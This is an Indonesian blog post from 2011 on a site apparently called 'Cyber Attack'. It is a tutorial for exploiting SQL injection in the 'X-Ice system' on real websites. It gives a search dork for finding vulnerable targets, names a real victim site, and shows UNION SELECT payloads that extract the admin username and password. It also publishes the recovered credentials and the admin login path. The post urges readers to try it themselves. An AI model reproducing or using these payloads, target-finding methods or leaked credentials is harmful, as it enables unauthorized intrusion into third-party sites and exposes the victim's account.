Tuesday, December 6, 2011

SQL Injection pada X-Ice System

kali ini saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah… Description: :)
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.
Description: :)

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat …
ex : inurl:/devami.asp?id= geri
Korban yang saya dapatkan adalah :
http://www.radyopinarim.com/haber1/devami.asp?id=1
Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini
Microsoft OLE DB Provider for ODBC Drivers hata ’80040e14′
[Microsoft][ODBC Microsoft Access Sürücüsü] ‘id=’ sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)
/haber1/devami.asp, satýr 8
Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan
-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,
kullaniciadi,2,3,4,5,6,7+from+admin
Yang saya dapatkan usernamenya adalah Kadrius
dan untuk mencari passwordnya
:
-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
passwordnya adalah 19901990
Untuk login sebagai admin anda tinggal balik kehalaman
/admin/kontrol.asp
Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.

No comments:

Post a Comment

 
Cyber Attack © 2011 Templates | g0bl33h